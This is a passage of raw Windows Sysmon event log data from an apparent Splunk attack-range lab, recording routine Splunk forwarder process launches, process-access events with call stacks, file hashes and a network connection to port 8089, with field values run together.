Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:47.196{4F8D34B0-1AE7-6216-7405-000000003902}1936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=614F020DD3DAF42EE0DE3B4E0DA6EF7C,SHA256=DDD67886D52A9ED8F7671CB74AF1C2FCC03A942ABD45B621CA79C79A4A9EF55A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AE8-6216-7505-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1AE8-6216-7505-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.882{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AE8-6216-7505-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:48.883{4F8D34B0-1AE8-6216-7505-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000300009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:48.789{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=683547BED5CED4F9114CA6FBF27D5B34,SHA256=1E63A880846399FF256894197DAB2E05DB72ADA4CB99065460C5FF602BA53CF2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:46.340{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51812-false10.0.1.12-8089- 23542300x8000000000000000300010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:49.821{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5395DD3EFF8568B89CB7A0DD0008BD2F,SHA256=3B658F2EAF272DE3F0DBAE7A34EF19F24A6BA37F0A5DF802561C2CEDF03AF642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.898{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10DFFA12F92B672F4763F0E84CC718C3,SHA256=F55CD6E9A2E0637C7C8716746CB4C4885FD5B4AF5A47027697745C7563D2E225,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.632{4F8D34B0-1AE9-6216-7605-000000003902}34483536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AE9-6216-7605-000000003902}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:49.382{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 